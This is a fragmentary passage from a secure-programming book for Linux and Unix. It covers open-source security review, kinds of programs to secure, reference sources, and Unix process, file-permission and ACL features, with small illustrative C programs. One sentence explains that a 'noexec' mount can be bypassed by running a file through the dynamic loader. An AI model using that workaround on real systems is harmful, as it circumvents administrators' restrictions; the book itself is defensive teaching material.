finding ways to attack programs, or to see how vulnerable a program is, but aren’t helpful for updating
programs.
Thus, developers will say “source code is vital” when they intend to add functionality, but the fact that
the source code for closed source programs is hidden doesn’t protect the program very much. In fact,
users of binary-only programs can have a problem when they use decompilers or binary scanning tools;
it’s quite possible for a diligent user to know of a security flaw they can exploit but can’t easily fix, and
they may not be able to convince the vendor to fix it either.
And this assumes you can keep the source code secret from attackers anyway. For example, Microsoft
has had at least parts of its source code stolen several times, at least once from Microsoft itself and at
least once from another company it shared data with. Microsoft also has programs to share its source
code with various governments, companies, and educational settings; some of those organizations
include attackers, and those organizations could be attacked by others to acquire the source code. I use
this merely as an example; there are many reasons source code must be shared by many companies. And
this doesn’t even take into consideration that aggrieved workers might maliciously release the source
code. Depending on long-term secrecy of source code is self-deception; you may delay its release, but if
it’s important, it will probably be stolen sooner or later. Keeping the source code secret makes financial
sense for proprietary vendors as a way to encourage customers to buy the products and support, but it is
not a strong security measure.
The comments of Microsoft’s Scott Culp, manager of the company’s security response center, echo a common
refrain in a long, ongoing battle over information. Discussions of morality regarding the distribution of
information go way back and are very familiar. Several centuries ago, for example, the church tried to squelch
Copernicus’ and Galileo’s theory of the sun being at the center of the solar system... Culp’s attempt to blame
"information security professionals" for the recent spate of vulnerabilities in Microsoft products is at best
disingenuous. Perhaps, it also represents an attempt to deflect criticism from the company that built those
products... [The] efforts of all parties contribute to a continuous process of improvement. The more widely
vulnerabilities become known, the more quickly they get fixed.
discouraging is that the backdoor can be easily found simply by looking at an ASCII dump of the
program (a common cracker trick). Once this problem was found by open source developers reviewing
the code, it was patched quickly. You could argue that, by keeping the password unknown, the program
stayed safe, and that opening the source made the program less secure. I think this is nonsense, since
ASCII dumps are trivial to do and well-known as a standard attack technique, and not all attackers have
sudden urges to announce vulnerabilities - in fact, there’s no way to be certain that this vulnerability has
not been exploited many times. It’s clear that after the source was opened, the source code was reviewed
over time, and the vulnerabilities found and fixed. One way to characterize this is to say that the original
code was vulnerable, its vulnerabilities became easier to exploit when it was first made open source, and
then finally these vulnerabilities were fixed.
• First, people have to actually review the code. This is one of the key points of debate - will people
really review code in an open source project? All sorts of factors can reduce the amount of review:
being a niche or rarely-used product (where there are few potential reviewers), having few developers,
and use of a rarely-used computer language. Clearly, a program that has a single developer and no
other contributors of any kind doesn’t have this kind of review. On the other hand, a program that has a
primary author and many other people who occasionally examine the code and contribute suggests
that there are others reviewing the code (at least to create contributions). In general, if there are more
reviewers, there’s a higher likelihood that someone will identify a flaw - this is the basis of
the “many eyeballs” theory. Note that, for example, the OpenBSD project continuously examines
programs for security flaws, so the components in its innermost parts have certainly undergone a
lengthy review. Since OSS/FS discussions are often held publicly, this level of review is something
that potential users can judge for themselves.
One factor that can particularly reduce review likelihood is not actually being open source. Some
vendors like to position their “disclosed source” (also called “source available”) programs as being
open source, but since the program owner has extensive exclusive rights, others will have far less
incentive to work “for free” for the owner on the code. Even open source licenses which have
unusually asymmetric rights (such as the MPL) have this problem. After all, people are less likely to
voluntarily participate if someone else will have rights to their results that they don’t have (as Bruce
Perens says, “who wants to be someone else’s unpaid employee?”). In particular, since the reviewers
with the most incentive tend to be people trying to modify the program, this disincentive to participate
reduces the number of “eyeballs”. Elias Levy made this mistake in his article about open source
security; his examples of software that had been broken into (e.g., TIS’s Gauntlet) were not, at the
time, open source.
• Second, at least some of the people developing and reviewing the code must know how to write secure
programs. Hopefully the existence of this book will help. Clearly, it doesn’t matter if there are “many
eyeballs” if none of the eyeballs know what to look for. Note that it’s not necessary for everyone to
know how to write secure programs, as long as those who do know how are examining the code
changes.
• Third, once found, these problems need to be fixed quickly and their fixes distributed. Open source
systems tend to fix the problems quickly, but the distribution is not always smooth. For example, the
OpenBSD developers do an excellent job of reviewing code for security flaws - but they don’t always
report the identified problems back to the original developer. Thus, it’s quite possible for there to be a
fixed version in one system, but for the flaw to remain in another. I believe this problem is lessening
over time, since no one “downstream” likes to repeatedly fix the same problem. Of course, ensuring
that security patches are actually installed on end-user systems is a problem for both open source and
closed source software.
Another advantage of open source is that, if you find a problem, you can fix it immediately. This really
doesn’t have any counterpart in closed source.
In short, the effect on security of open source software is still a major debate in the security community,
though a large number of prominent experts believe that it has great potential to be more secure.
• Application programs used as viewers of remote data. Programs used as viewers (such as word
processors or file format viewers) are often asked to view data sent remotely by an untrusted user (this
request may be automatically invoked by a web browser). Clearly, the untrusted user’s input should
not be allowed to cause the application to run arbitrary programs. It’s usually unwise to support
initialization macros (run when the data is displayed); if you must, then you must create a secure
sandbox (a complex and error-prone task that almost never succeeds, which is why you shouldn’t
support macros in the first place). Be careful of issues such as buffer overflow, discussed in Chapter 6,
which might allow an untrusted user to force the viewer to run an arbitrary program.
• Application programs used by the administrator (root). Such programs shouldn’t trust information that
can be controlled by non-administrators.
• Local servers (also called daemons).
• Network-accessible servers (sometimes called network daemons).
• Web-based applications (including CGI scripts). These are a special case of network-accessible
servers, but they’re so common they deserve their own category. Such programs are invoked indirectly
via a web server, which filters out some attacks but nevertheless leaves many attacks that must be
withstood.
• Applets (i.e., programs downloaded to the client for automatic execution). This is something Java is
especially famous for, though other languages (such as Python) support mobile code as well. There are
several security viewpoints here; the implementer of the applet infrastructure on the client side has to
make sure that the only operations allowed are “safe” ones, and the writer of an applet has to deal with
the problem of hostile hosts (in other words, you can’t normally trust the client). There is some
research attempting to deal with running applets on hostile hosts, but frankly I’m skeptical of the value
of these approaches and this subject is exotic enough that I don’t cover it further here.
• setuid/setgid programs. These programs are invoked by a local user and, when executed, are
immediately granted the privileges of the program’s owner and/or owner’s group. In many ways these
are the hardest programs to secure, because so many of their inputs are under the control of the
untrusted user and some of those inputs are not obvious.
This book merges the issues of these different types of program into a single set. The disadvantage of this
approach is that some of the issues identified here don’t apply to all types of programs. In particular,
setuid/setgid programs have many surprising inputs and several of the guidelines here only apply to
them. However, things are not so clear-cut, because a particular program may cut across these boundaries
(e.g., a CGI script may be setuid or setgid, or be configured in a way that has the same effect), and some
programs are divided into several executables each of which can be considered a different “type” of
program. The advantage of considering all of these program types together is that we can consider all
issues without trying to apply an inappropriate category to a program. As will be seen, many of the
principles apply to all programs that need to be secured.
There is a slight bias in this book toward programs written in C, with some notes on other languages such
as C++, Perl, PHP, Python, Ada95, and Java. This is because C is the most common language for
implementing secure programs on Unix-like systems (other than CGI scripts, which tend to use
languages such as Perl, PHP, or Python). Also, most other languages’ implementations call the C library.
This is not to imply that C is somehow the “best” language for this purpose, and most of the principles
described here apply regardless of the programming language used.
• Much of this information was scattered about; placing the critical information in one organized
document makes it easier to use.
• Some of this information is not written for the programmer, but is written for an administrator or user.
• Much of the available information emphasizes portable constructs (constructs that work on all
Unix-like systems), and failed to discuss Linux at all. It’s often best to avoid Linux-unique abilities for
portability’s sake, but sometimes the Linux-unique abilities can really aid security. Even if non-Linux
portability is desired, you may want to support the Linux-unique abilities when running on Linux.
And, by emphasizing Linux, I can include references to information that is helpful to someone
targeting Linux that is not necessarily true for others.
usually accompany it. Wood [1985] has some useful but dated advice in its “Security for Programmers”
chapter. Bellovin [1994] includes useful guidelines and some specific examples, such as how to
restructure an ftpd implementation to be simpler and more secure. FreeBSD provides some guidelines in
FreeBSD [1999]. [Quintero 1999] is primarily concerned with GNOME programming guidelines, but it
includes a section on security considerations. [Venema 1996] provides a detailed discussion (with
examples) of some common errors when programming secure programs (widely-known or predictable
passwords, burning yourself with malicious data, secrets in user-accessible data, and depending on other
programs). [Sibert 1996] describes threats arising from malicious data. Michael Bacarella’s article The
Peon’s Guide To Secure System Development provides a nice short set of guidelines.
There are many documents giving security guidelines for programs using the Common Gateway Interface
(CGI) to interface with the web. These include Van Biesbrouck [1996], Gundavaram [unknown],
[Garfinkle 1997], Kim [1996], Phillips [1995], Stein [1999], [Peteanu 2000], and [Advosys 2000].
There are many documents specific to a language, which are further discussed in the language-specific
sections of this book. For example, the Perl distribution includes perlsec(1), which describes how to use
Perl more securely. The Secure Internet Programming site at http://www.cs.princeton.edu/sip is
interested in computer security issues in general, but focuses on mobile code systems such as Java,
ActiveX, and JavaScript; Ed Felten (one of its principals) co-wrote a book on securing Java ([McGraw
1999]) which is discussed in Section 10.6. Sun’s security code guidelines provide some guidelines
primarily for Java and C; it is available at http://java.sun.com/security/seccodeguide.html.
Yoder [1998] contains a collection of patterns to be used when dealing with application security. It’s not
really a specific set of guidelines, but a set of commonly-used patterns for programming that you may
find useful. The Shmoo Group maintains a web page linking to information on how to write secure code
at http://www.shmoo.com/securecode.
There are many documents describing the issue from the other direction (i.e., “how to crack a system”).
One example is McClure [1999], and there’s countless amounts of material from that vantage point on
the Internet. There are also more general documents on computer architectures on how attacks must be
developed to exploit them, e.g., [LSD 2001]. The Honeynet Project has been collecting information
(including statistics) on how attackers actually perform their attacks; see their website at
http://project.honeynet.org for more information. Insecure Programming by example provides a set of
insecure programs, intended for use as exercises to practice attacking insecure programs.
There’s also a large body of information on vulnerabilities already identified in existing programs. This
can be a useful set of examples of “what not to do,” though it takes effort to extract more general
guidelines from the large body of specific examples. There are mailing lists that discuss security issues;
one of the most well-known is Bugtraq, which among other things develops a list of vulnerabilities. The
CERT Coordination Center (CERT/CC) is a major reporting center for Internet security problems which
reports on vulnerabilities. The CERT/CC occasionally produces advisories that provide a description of a
serious security problem and its impact, along with instructions on how to obtain a patch or details of a
workaround; for more information see http://www.cert.org. Note that originally the CERT was a small
computer emergency response team, but officially “CERT” doesn’t stand for anything now. The
Department of Energy’s Computer Incident Advisory Capability (CIAC) also reports on vulnerabilities.
These different groups may identify the same vulnerabilities but use different names. To resolve this
problem, MITRE supports the Common Vulnerabilities and Exposures (CVE) list which creates a single
unique identifier (“name”) for all publicly known vulnerabilities and security exposures identified by
others; see http://www.cve.mitre.org. NIST’s ICAT is a searchable catalog of computer vulnerabilities,
categorizing each CVE vulnerability so that they can be searched and compared later; see
http://csrc.nist.gov/icat.
This book is a summary of what I believe are the most useful and important guidelines. My goal is a
book that a good programmer can just read and then be fairly well prepared to implement a secure
program. No single document can really meet this goal, but I believe the attempt is worthwhile. My
objective is to strike a balance somewhere between a “complete list of all possible guidelines” (that
would be unending and unreadable) and the various “short” lists available on-line that are nice and short
but omit a large number of critical issues. When in doubt, I include the guidance; I believe in that case
it’s better to make the information available to everyone in this “one stop shop” document. The
organization presented here is my own (every list has its own, different structure), and some of the
guidelines (especially the Linux-unique ones, such as those on capabilities and the FSUID value) are also
my own. Reading all of the referenced documents listed above as well is highly recommended, though I
realize that for many it’s impractical.
• Securityfocus.com has a wealth of general security-related news and information, and hosts a number
of security-related mailing lists. See their website for information on how to subscribe and view their
archives. A few of the most relevant mailing lists on SecurityFocus are:
• The “Bugtraq” mailing list is, as noted above, a “full disclosure moderated mailing list for the
detailed discussion and announcement of computer security vulnerabilities: what they are, how to
exploit them, and how to fix them.”
• The “secprog” mailing list is a moderated mailing list for the discussion of secure software
development methodologies and techniques. I specifically monitor this list, and I coordinate with its
moderator to ensure that resolutions reached in SECPROG (if I agree with them) are incorporated
into this document.
• The “vuln-dev” mailing list discusses potential or undeveloped holes.
• IBM’s “developerWorks: Security” has a library of interesting articles. You can learn more from
http://www.ibm.com/developer/security.
• For Linux-specific security information, a good source is LinuxSecurity.com. If you’re interested in
auditing Linux code, places to see include the Linux Security-Audit Project FAQ and the Linux Kernel
Auditing Project, both of which are dedicated to auditing Linux code for security issues.
Of course, if you’re securing specific systems, you should sign up to their security mailing lists (e.g.,
Microsoft’s, Red Hat’s, etc.) so you can be warned of any security updates.
of the manual. The pointer value that means “does not point anywhere” is called NULL; C compilers
will convert the integer 0 to the value NULL in most circumstances where a pointer is needed, but note
that nothing in the C standard requires that NULL actually be implemented by a series of all-zero bits. C
and C++ treat the character “\0” (ASCII 0) specially, and this value is referred to as NIL in this book
(this is usually called “NUL”, but “NUL” and “NULL” sound identical). Function and method names
always use the correct case, even if that means that some sentences must begin with a lower case letter. I
use the term “Unix-like” to mean Unix, Linux, or other systems whose underlying models are very
similar to Unix; I can’t say POSIX, because there are systems such as Windows 2000 that implement
portions of POSIX yet have vastly different security models.
An attacker is called an “attacker”, “cracker”, or “adversary”, and not a “hacker”. Some journalists
mistakenly use the word “hacker” instead of “attacker”; this book avoids this misuse, because many
Linux and Unix developers refer to themselves as “hackers” in the traditional non-evil sense of the term.
To many Linux and Unix developers, the term “hacker” continues to mean simply an expert or enthusiast,
particularly regarding computers. It is true that some hackers commit malicious or intrusive actions, but
many other hackers do not, and it’s unfair to claim that all hackers perform malicious activities. Many
other glossaries and books note that not all hackers are attackers. For example, the Industry Advisory
Council’s Information Assurance (IA) Special Interest Group (SIG)’s Information Assurance Glossary
defines hacker as “A person who delights in having an intimate understanding of the internal workings of
computers and computer networks. The term is misused in a negative context where ‘cracker’ should be
used.” The Jargon File has a long and complicated definition for hacker, starting with “A person who
enjoys exploring the details of programmable systems and how to stretch their capabilities, as opposed to
most users, who prefer to learn only the minimum necessary.”; it notes that although some people use the
term to mean “A malicious meddler who tries to discover sensitive information by poking around”, it
also states that this definition is deprecated and that the correct term for this sense is “cracker” instead.
This book uses the logical quotation system, not the misleading typesetters’ quotation system. This
means that quoted information does not include any trailing punctuation if the punctuation is not part of
the material being quoted. The typesetters’ quotation system causes extraneous characters to be placed
inside the quotes; this has no effect in poetry but is a serious problem when accuracy is important. The
typesetters’ quotation system often falsifies quotes (since it includes punctuation not in the quote) and
can be disastrously erroneous in code or computer commands. The logical quotation system is widely
used in a variety of publications, including The Jargon File, Wikipedia, and the Linguistic Society of
America. This book uses standard American (not British) spelling.
Chapter 3. Summary of Linux and Unix Security Features
Discretion will protect you, and
understanding will guard you.
Proverbs 2:11 (NIV)
Before discussing guidelines on how to use Linux or Unix security features, it’s useful to know what
those features are from a programmer’s viewpoint. This section briefly describes those features that are
widely available on nearly all Unix-like systems. However, note that there is considerable variation
between different versions of Unix-like systems, and not all systems have the abilities described here.
This chapter also notes some extensions or features specific to Linux; Linux distributions tend to be
fairly similar to each other from the point-of-view of programming for security, because they all use
essentially the same kernel and C library (and the GPL-based licenses encourage rapid dissemination of
any innovations). It also notes some of the security-relevant differences between different Unix
implementations, but please note that this isn’t an exhaustive list. This chapter doesn’t discuss issues
such as implementations of mandatory access control (MAC) which many Unix-like systems do not
implement. If you already know what those features are, please feel free to skip this section.
Many programming guides skim briefly over the security-relevant portions of Linux or Unix and skip
important information. In particular, they often discuss “how to use” something in general terms but
gloss over the security attributes that affect their use. Conversely, there’s a great deal of detailed
information in the manual pages about individual functions, but the manual pages sometimes obscure
key security issues with detailed discussions on how to use each individual function. This section tries to
bridge that gap; it gives an overview of the security mechanisms in Linux that are likely to be used by a
programmer, concentrating specifically on the security ramifications. This section has more depth
than the typical programming guides, focusing specifically on security-related matters, and points to
references where you can get more details.
First, the basics. Linux and Unix are fundamentally divided into two parts: the kernel and “user space”.
Most programs execute in user space (on top of the kernel). Linux supports the concept of “kernel
modules”, which is simply the ability to dynamically load code into the kernel, but note that it still has
this fundamental division. Some other systems (such as the HURD) are “microkernel” based systems;
they have a small kernel with more limited functionality, and a set of “user” programs that implement the
lower-level functions traditionally implemented by the kernel.
Some Unix-like systems have been extensively modified to support strong security, in particular to
support U.S. Department of Defense requirements for Mandatory Access Control (level B1 or higher).
This version of this book doesn’t cover these systems or issues; I hope to expand to that in a future
version. More detailed information on some of them is available elsewhere, for example, details on SGI’s
“Trusted IRIX/B” are available in NSA’s Final Evaluation Reports (FERs).
When users log in, their usernames are mapped to integers marking their “UID” (for “user id”) and the
“GID”s (for “group id”) that they are a member of. UID 0 is a special privileged user (role) traditionally
called “root”; on most Unix-like systems (including the normal Linux kernel) root can overrule most
security checks and is used to administrate the system. On some Unix systems, GID 0 is also special and
permits unrestricted access to resources at the group level [Gay 2000, 228]; this isn’t true on
other systems (such as Linux), but even in those systems group 0 is essentially all-powerful because so
many special system files are owned by group 0. Processes are the only “subjects” in terms of security
(that is, only processes are active objects). Processes can access various data objects, in particular
filesystem objects (FSOs), System V Interprocess Communication (IPC) objects, and network ports.
Processes can also set signals. Other security-relevant topics include quotas and limits, libraries,
auditing, and PAM. The next few subsections detail this.
3.1. Processes
In Unix-like systems, user-level activities are implemented by running processes. Most Unix systems
support a “thread” as a separate concept; threads share memory inside a process, and the system
scheduler actually schedules threads. Linux does this differently (and in my opinion uses a better
approach): there is no essential difference between a thread and a process. Instead, in Linux, when a
process creates another process it can choose what resources are shared (e.g., memory can be shared).
The Linux kernel then performs optimizations to get thread-level speeds; see clone(2) for more
information. It’s worth noting that the Linux kernel developers tend to use the word “task”, not “thread”
or “process”, but the external documentation tends to use the word process (so I’ll use the term “process”
here). When programming a multi-threaded application, it’s usually better to use one of the standard
thread libraries that hide these differences. Not only does this make threading more portable, but some
libraries provide an additional level of indirection, by implementing more than one application-level
thread as a single operating system thread; this can provide some improved performance on some
systems for some applications.
• RUID, RGID - real UID and GID of the user on whose behalf the process is running
• EUID, EGID - effective UID and GID used for privilege checks (except for the filesystem)
• SUID, SGID - Saved UID and GID; used to support switching permissions “on and off” as discussed
below. Not all Unix-like systems support this, but the vast majority do (including Linux and Solaris);
if you want to check if a given system implements this option in the POSIX standard, you can use
sysconf(2) to determine if _POSIX_SAVED_IDS is in effect.
• supplemental groups - a list of groups (GIDs) in which this user has membership. In the original
version 7 Unix, this didn’t exist - processes were only a member of one group at a time, and a special
command had to be executed to change that group. BSD added support for a list of groups in each
process, which is more flexible, and this addition is now widely implemented (including by Linux and
Solaris).
• umask - a set of bits determining the default access control settings when a new filesystem object is
created; see umask(2).
• scheduling parameters - each process has a scheduling policy, and those with the default policy
SCHED_OTHER have the additional parameters nice, priority, and counter. See sched_setscheduler(2)
for more information.
• limits - per-process resource limits (see below).
• filesystem root - the process’ idea of where the root filesystem (“/”) begins; see chroot(2).
• FSUID, FSGID - UID and GID used for filesystem access checks; this is usually equal to the EUID
and EGID respectively. This is a Linux-unique attribute.
• capabilities - POSIX capability information; there are actually three sets of capabilities on a process:
the effective, inheritable, and permitted capabilities. See below for more information on POSIX
capabilities. Linux kernel version 2.2 and greater support this; some other Unix-like systems do too,
but it’s not as widespread.
In Linux, if you really need to know exactly what attributes are associated with each process, the most
definitive source is the Linux source code, in particular /usr/include/linux/sched.h’s definition of
task_struct.
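As a minimal sketch (not a complete audit of a process’s state), a program can print several of the attributes described above using standard calls such as getuid(2), umask(2), and sysconf; everything here is illustrative only:

    /* print-ids.c: print some security-relevant process attributes (illustrative sketch). */
    #include <stdio.h>
    #include <sys/types.h>
    #include <sys/stat.h>
    #include <unistd.h>

    int main(void) {
        /* Real and effective user and group IDs. */
        printf("RUID=%ld EUID=%ld RGID=%ld EGID=%ld\n",
               (long) getuid(), (long) geteuid(),
               (long) getgid(), (long) getegid());

        /* umask(2) can only be read by setting it, so set it and restore it. */
        mode_t old = umask(0);
        umask(old);
        printf("umask=%03o\n", (unsigned) old);

        /* Check whether saved set-user-IDs (_POSIX_SAVED_IDS) are supported. */
        printf("saved IDs %s\n",
               sysconf(_SC_SAVED_IDS) > 0 ? "supported" : "not supported");
        return 0;
    }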
The portable way to create new processes is to use the fork(2) call. BSD introduced a variant called vfork(2)
as an optimization technique. The bottom line with vfork(2) is simple: don’t use it if you can avoid it.
See Section 8.6 for more information.
Linux supports the Linux-unique clone(2) call. This call works like fork(2), but allows specification of
which resources should be shared (e.g., memory, file descriptors, etc.). Various BSD systems implement
an rfork() system call (originally developed in Plan9); it has different semantics but the same general
idea (it also creates a process with tighter control over what is shared). Portable programs shouldn’t use
these calls directly, if possible; as noted earlier, they should instead rely on threading libraries that use
such calls to implement threads.
This book is not a full tutorial on writing programs, so I will skip widely-available information on handling
processes. You can see the documentation for wait(2), exit(2), and so on for more information.
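For reference, here is a hedged sketch of the usual portable pattern built on fork(2): the parent creates a child and then waits for it with waitpid(2):

    /* fork-demo.c: minimal fork(2)/waitpid(2) pattern (illustrative sketch only). */
    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/wait.h>
    #include <unistd.h>

    int main(void) {
        pid_t pid = fork();
        if (pid < 0) {               /* fork failed */
            perror("fork");
            exit(EXIT_FAILURE);
        } else if (pid == 0) {       /* child process */
            printf("child: pid=%ld\n", (long) getpid());
            _exit(0);
        } else {                     /* parent process */
            int status;
            if (waitpid(pid, &status, 0) < 0)
                perror("waitpid");
            else if (WIFEXITED(status))
                printf("parent: child exited with %d\n", WEXITSTATUS(status));
        }
        return 0;
    }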
3.2. Files
On all Unix-like systems, the primary repository of information is the file tree, rooted at “/”. The file tree
is a hierarchical set of directories, each of which may contain filesystem objects (FSOs).
In Linux, filesystem objects (FSOs) may be ordinary files, directories, symbolic links, named pipes (also
called first-in first-outs or FIFOs), sockets (see below), character special (device) files, or block special
(device) files (in Linux, this list is given in the find(1) command). Other Unix-like systems have an
identical or similar list of FSO types.
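As an illustrative sketch, a program can ask which kind of FSO a path refers to with lstat(2) and the S_IS* test macros (the command-line interface here is just an example):

    /* fso-type.c: report the type of a filesystem object (illustrative sketch). */
    #include <stdio.h>
    #include <sys/stat.h>

    int main(int argc, char **argv) {
        struct stat st;
        if (argc != 2) { fprintf(stderr, "usage: %s path\n", argv[0]); return 1; }
        /* lstat(2) does not follow symbolic links, so links are reported as links. */
        if (lstat(argv[1], &st) != 0) { perror("lstat"); return 1; }
        if      (S_ISREG(st.st_mode))  puts("ordinary file");
        else if (S_ISDIR(st.st_mode))  puts("directory");
        else if (S_ISLNK(st.st_mode))  puts("symbolic link");
        else if (S_ISFIFO(st.st_mode)) puts("named pipe (FIFO)");
        else if (S_ISSOCK(st.st_mode)) puts("socket");
        else if (S_ISCHR(st.st_mode))  puts("character special (device) file");
        else if (S_ISBLK(st.st_mode))  puts("block special (device) file");
        else                           puts("unknown FSO type");
        return 0;
    }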
Filesystem objects are collected on filesystems, which can be mounted and unmounted on directories in
the file tree. A filesystem type (e.g., ext2 and FAT) is a specific set of conventions for arranging data on
the disk to optimize speed, reliability, and so on; many people use the term “filesystem” as a synonym for
the filesystem type.
• owning UID and GID - identifies the “owner” of the filesystem object. Only the owner or root can
change the access control attributes unless otherwise noted.
• permission bits - read, write, execute bits for each of user (owner), group, and other. For ordinary files,
read, write, and execute have their typical meanings. In directories, the “read” permission is necessary
to display a directory’s contents, while the “execute” permission is sometimes called “search”
permission and is necessary to actually enter the directory to use its contents. In a directory “write”
permission on a directory permits adding, removing, and renaming files in that directory; if you only
want to permit adding, set the sticky bit noted below. Note that the permission values of symbolic links
are never used; it’s only the values of their containing directories and the linked-to file that matter.
• “sticky” bit - when set on a directory, unlinks (removes) and renames of files in that directory are
limited to the file owner, the directory owner, or root privileges. This is a very common Unix extension
and is specified in the Open Group’s Single Unix Specification version 2. Old versions of Unix called
this the “save program text” bit and used this to indicate executable files that should stay in memory.
Systems that did this ensured that only root could set this bit (otherwise users could have crashed
systems by forcing “everything” into memory). In Linux, this bit has no effect on ordinary files and
ordinary users can modify this bit on the files they own: Linux’s virtual memory management makes
this old use irrelevant.
• setuid, setgid - when set on an executable file, executing the file will set the process’ effective UID or
effective GID to the value of the file’s owning UID or GID (respectively). All Unix-like systems
support this. In Linux and System V systems, when setgid is set on a file that does not have any
execute privileges, this indicates a file that is subject to mandatory locking during access (if the
filesystem is mounted to support mandatory locking); this overload of meaning surprises many and is
not universal across Unix-like systems. In fact, the Open Group’s Single Unix Specification version 2
for chmod(3) permits systems to ignore requests to turn on setgid for files that aren’t executable if
such a setting has no meaning. In Linux and Solaris, when setgid is set on a directory, files created in
the directory will have their GID automatically reset to that of the directory’s GID. The purpose of this
approach is to support “project directories”: users can save files into such specially-set directories and
the group owner automatically changes. However, setting the setgid bit on directories is not specified
by standards such as the Single Unix Specification [Open Group 1997].
• timestamps - access and modification times are stored for each filesystem object. However, the owner
is allowed to set these values arbitrarily (see touch(1)), so be careful about trusting this information.
All Unix-like systems support this.
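As a hedged illustration of the attributes just listed, a program can inspect a file’s owner, permission bits, and the setuid, setgid, and sticky bits through stat(2):

    /* perm-check.c: inspect ownership and mode bits of a file (illustrative sketch). */
    #include <stdio.h>
    #include <sys/stat.h>

    int main(int argc, char **argv) {
        struct stat st;
        if (argc != 2) { fprintf(stderr, "usage: %s path\n", argv[0]); return 1; }
        if (stat(argv[1], &st) != 0) { perror("stat"); return 1; }

        printf("owning UID=%ld GID=%ld mode=%04o\n",
               (long) st.st_uid, (long) st.st_gid,
               (unsigned) (st.st_mode & 07777));

        if (st.st_mode & S_ISUID) puts("setuid bit is set");
        if (st.st_mode & S_ISGID) puts("setgid bit is set");
        if (st.st_mode & S_ISVTX) puts("sticky bit is set");
        return 0;
    }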
The following attributes are Linux-unique extensions on the ext2 filesystem, though many other
filesystems have similar functionality:
• immutable bit - no changes to the filesystem object are allowed; only root can set or clear this bit. This
is only supported by ext2 and is not portable across all Unix systems (or even all Linux filesystems).
• append-only bit - only appending to the filesystem object is allowed; only root can set or clear this
bit. This is only supported by ext2 and is not portable across all Unix systems (or even all Linux
filesystems).
Other common extensions include some sort of bit indicating “cannot delete this file”.
Some Unix-like systems also support extended attributes (known in the Macintosh world as “resource
forks”), which are essentially name/value pairs associated with files or directories but not stored inside
the data of the file or directory itself. Extended attributes can store more detailed access control
information, a MIME type, and so on. Linux kernel 2.6 adds this capability, but since many systems and
filesystems don’t support extended attributes, many programs choose not to use them.
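For the curious, on Linux these attributes are read and written with setxattr(2) and getxattr(2); the following is a hedged sketch (the attribute name "user.comment" is just an example, and the calls fail on filesystems without xattr support):

    /* xattr-demo.c: set and read back a user extended attribute (Linux-specific sketch). */
    #include <stdio.h>
    #include <string.h>
    #include <sys/xattr.h>

    int main(int argc, char **argv) {
        const char *value = "reviewed";
        char buf[256];
        ssize_t len;

        if (argc != 2) { fprintf(stderr, "usage: %s path\n", argv[0]); return 1; }

        /* "user.*" attributes can normally be set by the file owner. */
        if (setxattr(argv[1], "user.comment", value, strlen(value), 0) != 0) {
            perror("setxattr");   /* fails if the filesystem lacks xattr support */
            return 1;
        }
        len = getxattr(argv[1], "user.comment", buf, sizeof(buf) - 1);
        if (len < 0) { perror("getxattr"); return 1; }
        buf[len] = '\0';
        printf("user.comment=%s\n", buf);
        return 0;
    }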
Some Unix-like systems support POSIX access control lists (ACLs), which allow users to specify in
more detail who specifically can access a file and how. See Section 3.2.2 for more information.
Many of these values can be influenced at mount time, so that, for example, certain bits can be treated as
though they had a certain value (regardless of their values on the media). See mount(1) for more
information about this. These bits are useful, but be aware that some of these are intended to simplify
ease-of-use and aren’t really sufficient to prevent certain actions. For example, on Linux, mounting with
“noexec” will disable execution of programs on that file system; as noted in the manual, it’s intended for
mounting filesystems containing binaries for incompatible systems. On Linux, this option won’t
completely prevent someone from running the files; they can copy the files somewhere else to run them,
or even use the command “/lib/ld-linux.so.2” to run the file directly.
Some filesystems don’t support some of these access control values; again, see mount(1) for how these
filesystems are handled. In particular, many Unix-like systems support MS-DOS disks, which by default
support very few of these attributes (and there’s no standard way to define these attributes). In that case,
Unix-like systems emulate the standard attributes (possibly implementing them through special on-disk
files), and these attributes are generally influenced by the mount(1) command.
It’s important to note that, for adding and removing files, only the permission bits and owner of the file’s
directory really matter unless the Unix-like system supports more complex schemes (such as POSIX
ACLs). Unless the system has other extensions, and stock Linux 2.2 and 2.4 do not, a file that has no
permissions in its permission bits can still be removed if its containing directory permits it (exception:
directories marked as "sticky" have special rules). Also, if an ancestor directory permits its children to be
changed by some user or group, then any of that directory’s descendants can be replaced by that user or
group.
It’s worth noting that in Linux, the Linux ext2 filesystem by default reserves a small amount of space for
the root user. This is a partial defense against denial-of-service attacks; even if a user fills a disk that is
shared with the root user, the root user has a little space left over (e.g., for critical functions). The default
is 5% of the filesystem space; see mke2fs(8), in particular its “-m” option.
can access the FSO; every directory can also have a set of default ACL entries used when an FSO is
created inside it. Each ACL entry can be one of a number of different types, and each entry also specifies what
accesses are granted (r for read, w for write, x for execute). Unfortunately, the POSIX draft names for
these ACL entry types are really ugly; it’s actually a simple system, complicated by bad names. There
are "short form" and "long form" ways of displaying and setting this information.
Here are their official names, with an explanation, and the short and long form (as documented in acl(5)):
• ACL_USER_OBJ - permissions of the file owner; short form “u::”, long form “user::”.
• ACL_USER - permissions of a specific named user; short form “u:uid:”, long form “user:uid:”.
• ACL_GROUP_OBJ - permissions of the file’s group owner; short form “g::”, long form “group::”.
• ACL_GROUP - permissions of a specific named group; short form “g:gid:”, long form “group:gid:”.
• ACL_MASK - the maximum permissions that can be granted by ACL_USER, ACL_GROUP_OBJ, and ACL_GROUP entries; short form “m::”, long form “mask::”.
• ACL_OTHER - permissions of everyone else; short form “o::”, long form “other::”.
The "mask" is the gimmick that makes these extended POSIX ACLs work well with programs not
designed to work with them. If you specify any specific users or groups other than the owner or group
owner (i.e., you use ACL_USER or ACL_GROUP), then you automatically have to have a mask entry.
For more information on POSIX ACLs, see acl(5).
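As a hedged sketch (it assumes the libacl development files and linking with -lacl), a program can retrieve a file’s access ACL and print it in the long text form:

    /* acl-show.c: print a file's POSIX access ACL in long text form (sketch; link with -lacl). */
    #include <stdio.h>
    #include <sys/acl.h>

    int main(int argc, char **argv) {
        acl_t acl;
        char *text;

        if (argc != 2) { fprintf(stderr, "usage: %s path\n", argv[0]); return 1; }

        acl = acl_get_file(argv[1], ACL_TYPE_ACCESS);
        if (acl == NULL) { perror("acl_get_file"); return 1; }

        text = acl_to_text(acl, NULL);     /* long form: "user::rw-", "mask::r--", ... */
        if (text == NULL) { perror("acl_to_text"); acl_free(acl); return 1; }

        fputs(text, stdout);
        acl_free(text);
        acl_free(acl);
        return 0;
    }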
new subdirectory will also have its setgid bit set (so that project subdirectories will “do the right thing”);
in all other cases the setgid is clear for a new file. This is the rationale for the “user-private group”
scheme (used by Red Hat Linux and some others). In this scheme, every user is a member of a “private”
